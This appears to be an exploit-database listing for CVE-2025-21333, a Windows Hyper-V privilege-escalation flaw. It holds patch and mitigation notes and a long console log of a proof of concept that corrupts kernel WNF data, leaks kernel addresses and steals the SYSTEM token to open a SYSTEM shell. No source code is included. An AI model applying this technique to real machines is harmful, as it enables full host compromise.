Exploit for Heap-based Buffer Overflow in Microsoft CVE-2025-21333

Name: Exploit for Heap-based Buffer Overflow in Microsoft CVE-2025-21333
Rating: 5 (148 reviews)
2025-06-11 | CVSS 7.8
## https://sploitus.com/exploit?id=ABF7750F-36A7-55DD-8333-1B613EA02E59
# CVE-2025-21333 Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege Vulnerability ‼️

# Description:

CVE‑2025‑21333 is a high-severity elevation of privilege vulnerability in Windows Hyper‑V’s NT Kernel Integration Virtualization Service Provider (VSP), allowing a local, authenticated attacker to escalate to SYSTEM privileges. Here's a detailed breakdown:

# 🔍 Overview:

+ Type: Heap‑based buffer overflow (CWE‑122) in the Hyper‑V NT Kernel Integration VSP component.
+ CVSS v3.1: 7.8 (High 🔴) — Attack Vector: Local, Complexity: Low, Privileges: Low, No user interaction, Full impact on confidentiality, integrity, availability.

# ⚠️ Impact:

+ A maliciously crafted Virtual Service Provider (VSP) within a VM can exploit this flaw to gain full SYSTEM control over the Hyper‑V host.
+ This allows attackers to compromise VM isolation, access sensitive data, install persistent malware, or pivot to other systems.

# 🛡️ Patching & Mitigation:

1. Patch released: Microsoft addressed this in the January 14, 2025 Patch Tuesday update.
2. Accelerated response: The U.S. CISA added it to the Known Exploited Vulnerabilities catalog on January 14, 2025, mandating remediation by February 4, 2025.
3. Apply updates immediately: Ensure all Hyper‑V hosts (Windows 10/11, Server 2022/2025, etc.) are running builds newer than those listed in the mitigation guidance .

# 🖥️ Affected Systems (Examples):

+ Windows 10 21H2, 22H2
+ Windows 11 22H2, 23H2, 24H2 (x86/ARM64)
+ Windows Server 2022 23H2 & Server 2025 builds
  — Impacted if host build is below the patched OS version threshold

```
PS C:\Windows\System32\drivers> get-filehash .\vkrnlintvsp.sys

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          28948C65EF108AA5B43E3D10EE7EA7602AEBA0245305796A84B4F9DBDEDDDF77       C:\Windows\System32\drivers\v...

PS C:\Windows\System32\drivers>
```

```
PS C:\Windows\System32> Get-FileHash ntoskrnl.exe

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          999C51D12CDF17A57054068D909E88E1587A9A715F15E0DE9E32F4AA4875C473       C:\Windows\System32\ntoskrnl.exe

PS C:\Windows\System32>
```

# Compile and Run:

Compile x64 Release version.

Run and get a system shell.

```
PS C:\Users\unpriv> .\CVE-2025-21333-POC.exe
Preparing...
[*] fNtCreateCrossVmEvent = 00007FFD6BC31690
[*] fNtQueryInformationProcess = 00007FFD6BC304E0
[!] WindowsSandboxClient.exe process not found
[*] spawning windows sandbox
[*] CreateProcessA returned successfully
[*] NtQueryInformationProcess returned successfully
[*] peb_addr = 0000000100335000
[*] ReadProcessMemory returned successfully
[*] ProcessParameters = 00000147B06A6430
[*] ReadProcessMemory returned successfully
[*] CommandLine = 00000147B06A6ADA
[*] CommandLine_size = 3f0
[*] commandline = C:\Windows\system32\WindowsSandboxClient.exe <ContainerId>19a1ef14-ee35-47d8-8bdb-cf4c86272272</ContainerId><AccountUser>WDAGUtilityAccount</AccountUser><AccountPassword>66387310-a27d-4a59-a688-3ab018388c9e</AccountPassword><AudioInputEnabled>true</AudioInputEnabled><ClipboardRedirectionEnabled>true</ClipboardRedirectionEnabled><RebootSupported>true</RebootSupported><SmartCardRedirectionEnabled>false</SmartCardRedirectionEnabled><FullScreenMode>false</FullScreenMode><TargetDisplay>0</TargetDisplay>
[*] extracted guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
[*] s_guid = 19a1ef14-ee35-47d8-8bdb-cf4c86272272
Created GUID
extracted guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72  ....5..G...L.'"r


guid
0x000000: 14 ef a1 19 35 ee d8 47 8b db cf 4c 86 27 22 72  ....5..G...L.'"r


Triggering vuln creating crossvmevent...
max corrupted WNF
state: a18d294541c64e6d val: 0  dataSize: 10040
calling NtqueryWnfStateData on max_corrupted with max_corrupted->state a18d2945a18d2945 and datasize10040
buffer content
[+] found WNF to be freed and replaced with RegBuffers
offset 30
[+] found WNF to be freed and replaced with PipeAttribute
offset2 80
updating regBuffersControllerWNF
calling NtUpdateWnfStateData on tokenReaderWNF->state a18d2945a18d2945 and datasize10040
calling NtUpdateWnfStateData returned successfully
[*] retrieving WNF with content 0x4343434343434343
[*] retrieving WNF with content 0x4444444444444444
searching in statenames2
found corrupted WNF: a18d514541c64e6dval: 4343434343434343
found corrupted WNF: a18d614541c64e6dval: 4444444444444444
found1 1 found2 1
found1 1 found2 1
found1 1 found2 1
0x000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000030: 00 00 05 0b 49 72 52 42 64 b9 76 d3 e4 ff d1 c6  ....IrRBd.v.....
0x000040: a0 a1 b1 f1 09 e3 ff ff 00 00 00 00 00 00 00 00  ................
0x000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000080: 00 00 05 03 4e 70 41 74 00 00 00 00 00 00 00 00  ....NpAt........
0x000090: d0 01 2b 47 0a d1 ff ff d0 01 2b 47 0a d1 ff ff  ..+G......+G....
0x0000a0: 38 81 2a 4d 0a d1 ff ff 16 00 00 00 00 00 00 00  8.*M............
0x0000b0: 3a 81 2a 4d 0a d1 ff ff 5a 00 41 41 41 41 41 41  :.*M....Z.AAAAAA
0x0000c0: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0x0000d0: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42  ....Wnf BBBBBBBB
0x0000e0: 00 00 00 00 50 ff 00 00 50 ff 00 00 01 00 00 00  ....P...P.......
0x0000f0: 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x000120: 00 00 05 03 57 6e 66 20 42 42 42 42 42 42 42 42  ....Wnf BBBBBBBB
0x000130: 00 00 00 00 00 ff 00 00 00 ff 00 00 01 00 00 00  ................
0x000140: 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................


[+] regBuffers found and can be overwritten
[+] pipeAttribute found and can be read
[*] original_regBufferEntry: ffffe309f1b1a1a0
[*] pipeAttributeFlink: ffffd10a472b01d0
[+] found target handle
[*] targetHandle: 00000211216BC4D0
[*] ioring index: 425
[*] fileObject: ffffe309f134d7e0
[*] base of npfs.sys: fffff80631660000
[*] base of ntoskrnl.exe: fffff80628c00000
[*] system EPROCESS: ffffe309ea4c2040
[*] system TOKEN: ffffd10a3a246040
[*] curpid: 21c8
Microsoft Windows [Version 10.0.22631.4460]
(c) Microsoft Corporation. All rights reserved.

C:\Users\unpriv>whoami
nt authority\system

C:\Users\unpriv>exit
calling NtUpdateWnfStateData returned successfully
PS C:\Users\unpriv>
```

# Disclaimer ⚠️

For educational and research purposes only. Use only against systems you own or have permission to test.